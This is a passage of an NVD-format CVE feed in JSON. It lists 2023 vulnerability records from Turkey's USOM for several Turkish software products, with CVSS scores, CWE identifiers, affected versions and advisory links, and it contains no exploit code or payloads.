{"resultsPerPage":138,"startIndex":0,"totalResults":138,"format":"NVD_CVE","version":"2.0","timestamp":"2026-06-01T17:10:54.081","vulnerabilities":[{"cve":{"id":"CVE-2023-0882","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-02-17T10:15:11.297","lastModified":"2026-06-01T13:16:19.890","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Input Validation, Authorization Bypass Through User-Controlled Key vulnerability in Kron Tech Single Connect on Windows allows Privilege Abuse. This issue affects Single Connect: 2.16."},{"lang":"es","value":"La validación de entrada inadecuada y la omisión de autorización a través de una vulnerabilidad de clave controlada por el usuario en Single Connect de Kron Tech  en Windows permiten el abuso de privilegios. Este problema afecta a Single Connect: 2.16."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","baseScore":8.8,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":5.9},{"source":"nvd@nist.gov","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","baseScore":8.8,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":5.9}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-639"}]},{"source":"nvd@nist.gov","type":"Secondary","description":[{"lang":"en","value":"CWE-639"}]}],"configurations":[{"operator":"AND","nodes":[{"operator":"
OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:krontech:single_connect:*:*:*:*:*:*:*:*","versionEndExcluding":"2.16.1","matchCriteriaId":"82B73035-D846-45AA-8955-3407A5FE3255"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*","matchCriteriaId":"A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}],"references":[{"url":"https://docs.krontech.com/singleconnect-2-16/update-patch-rdp-proxy-idor-vulnerability","source":"iletisim@usom.gov.tr","tags":["Patch","Vendor Advisory"]},{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0092","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0092","source":"iletisim@usom.gov.tr","tags":["Broken Link"]},{"url":"https://docs.krontech.com/singleconnect-2-16/update-patch-rdp-proxy-idor-vulnerability","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Patch","Vendor Advisory"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0092","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Broken Link"]}]}},{"cve":{"id":"CVE-2023-0939","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-02-23T08:15:17.100","lastModified":"2026-06-01T13:16:20.037","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in NTN Information Technologies Online Services Software allows SQL Injection.\n\nThis issue affects Online Services Software: before 
1.17."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-89"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:online_services_project:online_services:*:*:*:*:*:*:*:*","versionEndExcluding":"1.17","matchCriteriaId":"8683B937-5FE8-4AEF-8CA5-F873E36C4A22"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0103","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0103","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory","US Government Resource"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0103","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory","US Government 
Resource"]}]}},{"cve":{"id":"CVE-2023-1064","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-03-01T13:15:10.183","lastModified":"2026-06-01T13:16:20.917","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Uzay Baskul Weighbridge Automation Software allows SQL Injection.\n\nThis issue affects Weighbridge Automation Software: before 1.1."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-89"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:uzaybaskul:weighbridge_automation_software:*:*:*:*:*:*:*:*","versionEndExcluding":"1.1","matchCriteriaId":"87BABAD1-CF18-4A85-B2D4-DBF56D474FEE"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0115","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bil
dirim/tr-23-0115","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory","US Government Resource"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0115","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory","US Government Resource"]}]}},{"cve":{"id":"CVE-2023-1114","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-03-01T13:15:10.347","lastModified":"2026-06-01T13:16:21.160","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Missing Authorization vulnerability in Eskom e-Belediye allows Information Elicitation.\n\nThis issue affects e-Belediye: from 1.0.0.95 before 1.0.0.100."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9},{"source":"nvd@nist.gov","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-862"}]},{"source":"nvd@nist.gov","type":"Secondary","description":[{"lang":"en","value":"CWE-862"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:eskom:e-belediye:*:*:*:*:*:*:*:*","versionStartIncluding":"1.0.0.95","versionEndExcluding":"1.0.0.100","matchCriteriaId":"B7C2EFBA
-5833-4F6E-A69E-47B151BAC3E0"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0113-2","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0113-2","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory","US Government Resource"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0113-2","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory","US Government Resource"]}]}},{"cve":{"id":"CVE-2023-0577","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-03-03T07:15:08.650","lastModified":"2026-06-01T13:16:19.497","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ASOS Information Technologies SOBIAD allows Cross-Site Scripting (XSS).\n\nThis issue affects SOBIAD: before 23.02.01."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.7},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.7}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value
":"CWE-79"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:asosegitim:sobiad:*:*:*:*:*:*:*:*","versionEndExcluding":"23.02.01","matchCriteriaId":"7B96153E-CE0F-4A39-86D3-4315D497B2D8"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0125","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0125","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0125","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory"]}]}},{"cve":{"id":"CVE-2023-0578","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-03-03T07:15:09.053","lastModified":"2026-06-01T13:16:19.640","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ASOS Information Technologies Book Cites allows Cross-Site Scripting (XSS).\n\nThis issue affects Book Cites: before 
23.01.05."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.7},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.7}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-79"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:asosegitim:bookcites:*:*:*:*:*:*:*:*","versionEndExcluding":"23.01.05","matchCriteriaId":"DB973A87-D95C-47CB-978C-5ADBE52C4AB4"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0125","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0125","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0125","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory"]}]}},{"cve":{"id":"CVE-2023-0839","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-03-06T08:15:08.330","lastModified":"2026-06-01T13:16:19.750","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Protection for Outbound Error 
Messages and Alert Signals vulnerability in ProMIS Process Co. InSCADA allows Account Footprinting.\n\nThis issue affects inSCADA: before 20230115-1."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9},{"source":"nvd@nist.gov","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-1320"}]},{"source":"nvd@nist.gov","type":"Secondary","description":[{"lang":"en","value":"NVD-CWE-Other"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:inscada_project:inscada:*:*:*:*:*:*:*:*","versionEndExcluding":"20230115-1","matchCriteriaId":"3C8F91C8-9F7C-4EA4-ABA6-B603ED3BB904"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0127","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0127","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0127","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party 
Advisory"]}]}},{"cve":{"id":"CVE-2023-0979","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-03-06T15:15:10.077","lastModified":"2026-06-01T13:16:20.160","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in MedData MedDataPACS allows SQL Injection.\n\nThis issue affects MedDataPACS : before 2023-03-03."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9},{"source":"nvd@nist.gov","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]},{"source":"nvd@nist.gov","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:meddatapacs:meddatapacs:*:*:*:*:*:*:*:*","versionEndExcluding":"2022-03-03","matchCriteriaId":"9A26D1D6-4728-42D9-9E70-1B6D12F608C3"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0129","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0129","source":"iletisim@usom.go
v.tr","tags":["Third Party Advisory","US Government Resource"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0129","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory","US Government Resource"]}]}},{"cve":{"id":"CVE-2023-1267","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-03-08T12:15:09.267","lastModified":"2026-06-01T13:16:22.203","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Ulkem Company PtteM Kart.\n\nThis issue affects PtteM Kart: before 2.1."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-89"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:pttemkart:pttem_kart:*:*:*:*:*:*:*:*","versionEndExcluding":"2.1","matchCriteriaId":"482AB3A5-233C-422E-8F55-C1A5830A4710"}]}]}],"references":[{"url":"https://s
iberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0133","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0133","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory","US Government Resource"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0133","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory","US Government Resource"]}]}},{"cve":{"id":"CVE-2023-1251","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-03-09T08:15:08.553","lastModified":"2026-06-01T13:16:22.060","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Akinsoft Wolvox. This issue affects Wolvox: before 8.02.03."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-89"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:
akinsoft:wolvox:*:*:*:*:*:*:*:*","versionEndExcluding":"8.02.03","matchCriteriaId":"D94E3DDF-5087-4D22-BE44-71E3825ADC6A"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0136","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0136","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0136","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory"]}]}},{"cve":{"id":"CVE-2023-1091","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-03-10T08:15:09.610","lastModified":"2026-06-01T13:16:21.033","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Alpata Licensed Warehousing Automation System allows Command Line Execution through SQL Injection.\n\nThis issue affects Licensed Warehousing Automation System: through 
2023.1.01."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-89"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:alpatateknoloji:licensed_warehousing_automation_system:*:*:*:*:*:*:*:*","versionEndIncluding":"2023.1.01","matchCriteriaId":"CC8AF88B-9181-49BD-9B41-DB1DFC170984"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0139","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0139","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0139","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party 
Advisory"]}]}},{"cve":{"id":"CVE-2023-1198","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-03-10T21:15:14.550","lastModified":"2026-06-01T13:16:21.740","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Saysis Starcities allows SQL Injection.\n\nThis issue affects Starcities: through 1.3."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-89"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:saysis:starcities:*:*:*:*:*:*:*:*","versionEndIncluding":"1.3","matchCriteriaId":"3FCCB7DB-20F6-4DB0-AF7A-C6A5A28C364E"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0140","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0140","source":"iletisim@usom.gov.tr","tags":["Third Party 
Advisory"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0140","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory"]}]}},{"cve":{"id":"CVE-2023-1246","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-03-10T21:15:14.737","lastModified":"2026-06-01T13:16:21.893","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Files or Directories Accessible to External Parties vulnerability in Saysis Starcities allows Collect Data from Common Resource Locations.\n\nThis issue affects Starcities: through 